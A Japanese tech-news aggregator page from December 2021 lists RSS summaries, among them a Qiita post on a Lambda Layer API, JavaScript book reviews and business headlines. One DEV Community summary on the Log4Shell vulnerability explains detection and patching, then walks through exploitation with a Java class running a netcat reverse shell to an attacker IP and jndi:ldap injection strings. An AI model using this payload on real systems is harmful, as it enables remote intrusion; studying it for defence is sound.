| AWS |
lambdaタグが付けられた新着投稿 - Qiita |
外部ライブラリのLambda Layerを生成するAPIをLambdaで作ってみた【Python】 |
https://qiita.com/KenichiHiguchi/items/d16b9a8b0c2f10d035f6
|
入出力イメージcurlXGETrequestsgt求める機能任意のアーキテクチャ、Pythonバージョンで作成できる複数ライブラリをつのzipにまとめることができるライブラリのバージョン指定ができるSのURL発行し、そのURLで直接Layerを作成できるGETリクエストで実装し、ブラウザ上から直接URLを入力してAPIリクエストできる依存関係にあるライブラリは含まないでzipするオプションが選べるAWSサービスの構成S生成したzipファイルをキャッシュするストレージLambdaAPIリクエストを受け取り、Sの保存先URLの発行とコンパイル用Lambdaを非同期で実行する関数指定したライブラリをコンパイルし、zipしてSにアップロードする関数APIGatewayユーザーからのリクエストを受け取ってLambdaに転送するAPI個人的に既存手法で生じていた課題開発の背景AWS公式のLayer使いたいライブラリが用意されていないKlayersPythonに対応していない使いたいライブラリが用意されていない基本的に単一のライブラリに対してLayerが用意されているため、使いたいLayerの数がアタッチ上限数個を超える定期更新により旧バージョンのLayerが自動で削除されるため、突然Lambdaが動作しなくなるSAMAWSServerlessApplicationModelTerraformlambrollで運用しているため、SAMを使えない使いたくないDockerorローカル環境MMacarmをメインに使用しているため、x用にコンパイルできないpipでインストールしたファイルリソースをzipする際に、たまにディレクトリ構成をミスしてUnabletoimportmoduleが起きる参考KlayersGithubレイヤーの構築AWSServerlessApplicationModelDocumentAWSSAMCLIでLambdaLayersがビルドできるようになったよQiitaDockerでAWSLambdaのPython用Layerを作成するQiita実装解説コンソール版ここでは、AWSのコンソール画面上で構築する際の解説をします。 |
2021-12-26 04:23:32 |
| python |
Pythonタグが付けられた新着投稿 - Qiita |
外部ライブラリのLambda Layerを生成するAPIをLambdaで作ってみた【Python】 |
https://qiita.com/KenichiHiguchi/items/d16b9a8b0c2f10d035f6
|
入出力イメージcurlXGETrequestsgt求める機能任意のアーキテクチャ、Pythonバージョンで作成できる複数ライブラリをつのzipにまとめることができるライブラリのバージョン指定ができるSのURL発行し、そのURLで直接Layerを作成できるGETリクエストで実装し、ブラウザ上から直接URLを入力してAPIリクエストできる依存関係にあるライブラリは含まないでzipするオプションが選べるAWSサービスの構成S生成したzipファイルをキャッシュするストレージLambdaAPIリクエストを受け取り、Sの保存先URLの発行とコンパイル用Lambdaを非同期で実行する関数指定したライブラリをコンパイルし、zipしてSにアップロードする関数APIGatewayユーザーからのリクエストを受け取ってLambdaに転送するAPI個人的に既存手法で生じていた課題開発の背景AWS公式のLayer使いたいライブラリが用意されていないKlayersPythonに対応していない使いたいライブラリが用意されていない基本的に単一のライブラリに対してLayerが用意されているため、使いたいLayerの数がアタッチ上限数個を超える定期更新により旧バージョンのLayerが自動で削除されるため、突然Lambdaが動作しなくなるSAMAWSServerlessApplicationModelTerraformlambrollで運用しているため、SAMを使えない使いたくないDockerorローカル環境MMacarmをメインに使用しているため、x用にコンパイルできないpipでインストールしたファイルリソースをzipする際に、たまにディレクトリ構成をミスしてUnabletoimportmoduleが起きる参考KlayersGithubレイヤーの構築AWSServerlessApplicationModelDocumentAWSSAMCLIでLambdaLayersがビルドできるようになったよQiitaDockerでAWSLambdaのPython用Layerを作成するQiita実装解説コンソール版ここでは、AWSのコンソール画面上で構築する際の解説をします。 |
2021-12-26 04:23:32 |
| AWS |
AWSタグが付けられた新着投稿 - Qiita |
外部ライブラリのLambda Layerを生成するAPIをLambdaで作ってみた【Python】 |
https://qiita.com/KenichiHiguchi/items/d16b9a8b0c2f10d035f6
|
入出力イメージcurlXGETrequestsgt求める機能任意のアーキテクチャ、Pythonバージョンで作成できる複数ライブラリをつのzipにまとめることができるライブラリのバージョン指定ができるSのURL発行し、そのURLで直接Layerを作成できるGETリクエストで実装し、ブラウザ上から直接URLを入力してAPIリクエストできる依存関係にあるライブラリは含まないでzipするオプションが選べるAWSサービスの構成S生成したzipファイルをキャッシュするストレージLambdaAPIリクエストを受け取り、Sの保存先URLの発行とコンパイル用Lambdaを非同期で実行する関数指定したライブラリをコンパイルし、zipしてSにアップロードする関数APIGatewayユーザーからのリクエストを受け取ってLambdaに転送するAPI個人的に既存手法で生じていた課題開発の背景AWS公式のLayer使いたいライブラリが用意されていないKlayersPythonに対応していない使いたいライブラリが用意されていない基本的に単一のライブラリに対してLayerが用意されているため、使いたいLayerの数がアタッチ上限数個を超える定期更新により旧バージョンのLayerが自動で削除されるため、突然Lambdaが動作しなくなるSAMAWSServerlessApplicationModelTerraformlambrollで運用しているため、SAMを使えない使いたくないDockerorローカル環境MMacarmをメインに使用しているため、x用にコンパイルできないpipでインストールしたファイルリソースをzipする際に、たまにディレクトリ構成をミスしてUnabletoimportmoduleが起きる参考KlayersGithubレイヤーの構築AWSServerlessApplicationModelDocumentAWSSAMCLIでLambdaLayersがビルドできるようになったよQiitaDockerでAWSLambdaのPython用Layerを作成するQiita実装解説コンソール版ここでは、AWSのコンソール画面上で構築する際の解説をします。 |
2021-12-26 04:23:32 |
| 海外TECH |
MakeUseOf |
9 Ways to Open the Windows File Explorer |
https://www.makeuseof.com/windows-open-file-explorer/
|
drive |
2021-12-25 19:45:22 |
| 海外TECH |
MakeUseOf |
The 5 Best Shopping Apps on the Microsoft Store |
https://www.makeuseof.com/microsoft-store-best-shopping-apps/
|
things |
2021-12-25 19:15:11 |
| 海外TECH |
DEV Community |
Best JavaScript Books of 2021 |
https://dev.to/ra1nbow1/best-javascript-books-of-2021-4b6j
|
Best JavaScript Books of JS is still one of the most popular programming languages if not the most popular At least in the field of web development you can t do without it Not surprisingly new books on JavaScript are constantly being published as well as old ones being re published In this article we have collected several such books that will be published in Our selection includes books both for beginners and experienced programmers Modern JavaScript for the impatientAuthor Kay S Horstman Year of publication This book is not for beginners in programming there is no explanation of the basic things If you need the basics then there are plenty of such JavaScript books on the market just find the right one It is also not intended for JS programmers who want to learn new modern standards there are also enough such books Kay S Horstman is a Java advocate and Distinguished Professor of Computer Science at the university He set himself the goal of writing a book on JavaScript for those who are generally developing in another language for example Java C C or C but would like to quickly master JS in its modern form without historical excursions What might this be necessary for The fact is that user interfaces of programs are often hosted on the web and JS is supported by all browsers Therefore even programmers who work in other languages in principle periodically need to write something in JavaScript It s also worth noting that the book is specifically about the JavaScript language so you won t find information about specific tools and frameworks in it But it has a separate chapter dedicated to TypeScript JavaScript The Definitive GuideBy David Flanagan Year of publication David Flanagan is a well known author of books on JavaScript and also a programmer at Vmware This book is a thick and detailed reference guide The author examines the JavaScript language itself as well as the JS APIs implemented in browsers and Node The Book with a Rhinoceros is intended for readers who have experience in programming and want to learn JavaScript as well It will also be of interest to JS developers who want to dive deeper into this language In the th edition of Flanagan s work was published JavaScript EverywhereAuthors Adam D Scott Year of publication Language Russian Adam D Scott is a leading web developer at the Consumer Financial Protection Bureau in the United States creating open web applications In addition for many years he was engaged in training and drawing up curricula in technical disciplines In general we can say that this is an ideal specialist in teaching web development While teaching Scott noticed that many people learn better when they create something That s why his book JavaScript Development is a practical guide It is intended for people who are familiar with HTML CSS and JavaScript but are not yet able to use this knowledge to create real applications As you read this book you will understand the compatibility principles of different parts of the program so you can build great applications You will learn how to create APIs using Node Express MongoDB and Apollo Server and get acquainted with React Then you ll start creating a web application using React Apollo Client and CSS in JS as well as Electron based applications Mobile development is also in the plan You ll learn how to use React Native and Expo to develop apps for iOS and Android Deep Learning with JavaScriptAuthors Francois Chollet Eric Nielson Stan Bayleschi Shengquing Tsei Year of publication TensorFlow js ーthe first full featured library for creating neural networks in JavaScript It provides many opportunities in the field of machine learning and Scholle s book can serve as a guide to these opportunities As you read this book you will learn more about the TensorFlow API Learn how to use js to enter process and format data create and load models and perform inference evaluation and training The book covers the basic concepts of machine learning in detail Everything is explained using examples of JS code using pseudocode and schemas All the examples are open source so you can experiment with them But Scholle doesn t stop at just the basics of ML The book also includes information on newer topics text translation generative models and reinforcement learning This book is intended for experienced JavaScript programmers who would like to try their hand at machine learning The Joy of JavaScriptAuthor Luis Atencio Year of publication This book is intended for intermediate and advanced programmers i e for those who have already mastered the basics of the language but want to raise their understanding of its features to a new level In theory this should allow them to start getting real pleasure from programming in JavaScript As you read this book you will learn what JS can offer a developer on its own without third party libraries or frameworks The author covers the basics of JavaScript only in passing devoting more time to advanced topics so this book is not suitable for beginners JavaScript CookbookAuthors Adam D Scott Matthew MacDonald Shelley Powers Year of publication The Recipe Book offers ready made solutions for common programming tasks It also explains how to create applications that work in any browser This book is intended for practicing developers who are looking for solutions to specific problems related to JavaScript It can be read from cover to cover absorbing knowledge and getting acquainted with tips on a variety of topics However since the problems discussed are divided into categories the book can also be used as a reference book In the first part of the book the authors give recipes for using the JavaScript language itself The second part is devoted to JS in its natural habitat in the browser The third part deals with issues related to Node js ConclusionJavaScript books are a great investment for a web developer In this article we have shared with you reviews of some of the newest books We hope that they will help you find your way around and purchase the most suitable book for you |
2021-12-25 19:33:56 |
| 海外TECH |
DEV Community |
Understanding and Exploiting Log4J Vulnerability |
https://dev.to/ieeecsvitc/understanding-and-exploiting-log4j-vulnerability-28ji
|
Understanding and Exploiting LogJ VulnerabilityIf you are here then you might have already heard of logj vulnerability It is the current trending topic in IT domain as this vulnerability made millions of sites vulnerable to RCE Remote Code Execution Lets try to understand what is Logj and what vulnerability is exploited to gain RCE What is LogJ LogJ is a Java based open source component maintained by the Apache Foundation that is commonly incorporated into Java applications It allows to record traceability of operations at a functional and operational level in a multitude of services even from a security point of view So basically it is a library used for logging maintaining a record of events occurred in a application in applications this image shows how a log file look like What is the Vulnerability in Logj Developers were expecting the Logj library to record application server values including input strings with the expectation that those strings were plaintext and not able to invoke APIs but in logj if we gave input parameter like jndi ldap we were able to invoke JNDI API JNDI is the Java Naming and Directory Interface It is a library service allowing for runtime configuration So this JNDI API leads in leakage of sensitive information and thereby facilitate other attacks which finally results in getting a Reverse Shell Who are Affected by LogJ LogJ can be found in variety of places Its was widely used for logging in programmes Application Games Application Development tool and hence hackers have a wide range of targets to attack Average time to repair a software is Weeks As LogJ was widely used repairing it would takes years and hence this vulnerability is estimated to be exploited for years From Open Source to Commercial Solutions all are affected by by this Vulnerability Studies carried out by Google indicate that of the packages in the central Maven repository have been affected by this vulnerability you can check out this link for more info Affected Companies List Keeps on increasing Apple Intel Amazon Oracle VMWare IBM Cisco Redhat Atlassian BMC Fortinet F McAfee Twitter Baidu Tesla Palo Alto SonicWALL SolarWindsMany opensource solution are also affected here is the list of applications who used java in their infrastructure like Apache Struts Apache Struts Apache Tomcat Apache Spark Apache Solr Apache Kafka ElasticSearch flume Log stash IBM Qradar SIEM NetApp Pulse Secure etc Checkout this link for knowing Logj impact on manufacturers What are Hackers Doing by Exploiting this VulnerabilityHackers are running ransomware campaign Deploying botnets and Mine XMR coins on Compromised Systems None the less if they get access to data they will steal it Why Companies are not able to patch LogJ Completely Most of the companies have patched their code base for Logj but the problem that most of them are facing is that all the vendors of company need to patch logj package in their product which is out of their control and they cannot do anything in that Checking if the site is Vulnerable to logj RCETo check if the site is vulnerable to LogJ RCE first find areas where we can input strings like search box etc Then Visit and copy this text jndi ldap logshell huntress com lt Your unique identifier gt then paste it in the input area now go back to the page from where you copied and you will see a result keyword hyperlinked click on it and see if there is a entry of your site if the entry is there then your site is vulnerable to logj RCE Now lets understand what is logshell huntress com doing and how is it checking our site for vulnerability For this we have to understand how our input is working jndi gt this invokes JNDI API and access external resources idap gt this shows that target will reach out to an attacker controlled location over idap protocol logshell huntress com gt This is the address of attackers controlled host basically we are reaching out to this site All these parts makes us understand that we are establishing a connection between site and a attacker controlled host Alternately you can use cisagov logj scanner to scan for logj Vulnerability on your site Fixing The VulnerabilityTo fix this Vulnerability you should update your java and logj to latest Version i e LogJ V or above this doesn t guarantee that Vulnerability is fully patched but reduces some what risk Also check out snyk remediation cheat sheet Vulnerabilities Published on LogJCVE Version Affected Apache Logj beta a y a CVE Version Affected excluded y excluded CVE Version Affected Logj versions alpha hasta included Exploiting Vulnerability ONLY FOR CVE and CVE for Exploiting this vulnerability we will be writing an payload and then we will be compiling it and then we will trigger it to get reverse shell Follow Steps NOTE Here we are considering that our targeted server s OS is linux and netcat is already installed in it public class Exploit static try java lang Runtime getRuntime exec nc e bin bash lt YOUR ATTACKER IP ADDRESS gt lt Listening port gt catch Exception e e printStackTrace Write exploit in Exploit java file using above given codeCompile the java filejavac Exploit java source target Host a temporary HTTP server for exploitset a net cat listener to listen to exploit nc lnvp lt Attacker port number gt for CVE put jndi ldap YOUR ATTACKER IP ADDRESS ATTACKER PORT Exploit as inputfor CVE put jndi ldap attacker com exploit as input you got a reverse shell For CVE we cannot get a reverse shell but we can use j this parameter to to generate a StackOverflow exception that may lead to the termination of the vulnerable application process giving rise to a denial of service DoS vulnerability Use this link to get technical insight on the Vulnerability |
2021-12-25 19:23:11 |
| ニュース |
BBC News - Home |
In pictures: Christmas celebrations around the world |
https://www.bbc.co.uk/news/in-pictures-59787319?at_medium=RSS&at_campaign=KARANGA
|
covid |
2021-12-25 19:38:04 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
永田町「三国志」、岸田・麻生vs高市・安倍に割って入る河野・菅の隠密戦略 - DOL特別レポート |
https://diamond.jp/articles/-/291942
|
永田町「三国志」、岸田・麻生vs高市・安倍に割って入る河野・菅の隠密戦略DOL特別レポート永田町で権力闘争を巡る令和版「三国志」が幕開けた。 |
2021-12-26 04:52:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
大半の人が誤訳する【Kathy was married with a young boy in the forties.】正解は?[見逃し配信] - 見逃し配信 |
https://diamond.jp/articles/-/291868
|
大半の人が誤訳する【Kathywasmarriedwithayoungboyintheforties】正解は見逃し配信見逃し配信「ダイヤモンド・オンライン」で会員読者の反響が大きかった週間人気記事を中心に、その関連記事をお届け今回は週間人気記事ランキング位の『大半の人が誤訳する【Kathywasmarriedwithayoungboyintheforties】正解は』を中心に取り上げます。 |
2021-12-26 04:50:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
災害時にお風呂に水をためるのは非常識!?命を守るための備えをアップデート - ニュース3面鏡 |
https://diamond.jp/articles/-/284008
|
本稿では、このような水害被害を最小限にするために、今から対策しておくべきことや知っておくべきことについて解説していく。 |
2021-12-26 04:45:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
3月まで開催中のドバイ万博とは?中東初出店のスシローが連日人気! - 地球の歩き方ニュース&レポート |
https://diamond.jp/articles/-/291438
|
地球の歩き方 |
2021-12-26 04:40:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
トヨタ「ランドクルーザー」がフルモデルチェンジ!世界中で高い人気を誇る理由 - 男のオフビジネス |
https://diamond.jp/articles/-/291785
|
魅力 |
2021-12-26 04:35:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
たった15分で2000万円消滅…FXの「億り人」がビギナー時代にやらかした失敗 - from AERAdot. |
https://diamond.jp/articles/-/291376
|
fromaeradot |
2021-12-26 04:30:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
新日本酒紀行「磐城壽」 - 新日本酒紀行 |
https://diamond.jp/articles/-/290653
|
原子力発電所 |
2021-12-26 04:25:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
検索ワード分析で自殺者数の変動を予測できる、具体的な5つのワードとは - ヘルスデーニュース |
https://diamond.jp/articles/-/291622
|
検索ワード分析で自殺者数の変動を予測できる、具体的なつのワードとはヘルスデーニュースインターネット検索サイトの検索語句の分析から、自殺者数の変動を予測できるとする研究結果が報告された。 |
2021-12-26 04:20:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
英語力が「伸びる子」と「伸び悩む子」の意外な違いとは? - 世界最高の子ども英語 |
https://diamond.jp/articles/-/290002
|
世界最高 |
2021-12-26 04:15:00 |
| ビジネス |
ダイヤモンド・オンライン - 新着記事 |
ひろゆきが教える「お皿洗いのやり方」で優秀さを見抜く画期的な方法 - 1%の努力 |
https://diamond.jp/articles/-/289909
|
youtube |
2021-12-26 04:10:00 |
| ビジネス |
東洋経済オンライン |
いつも何かモノを「もらえる」人の意外な共通点 持ちすぎていた私が「もらう名人」になった理由 | 買わない生活 | 東洋経済オンライン |
https://toyokeizai.net/articles/-/479263?utm_source=rss&utm_medium=http&utm_campaign=link_back
|
東洋経済オンライン |
2021-12-26 04:30:00 |
コメント
コメントを投稿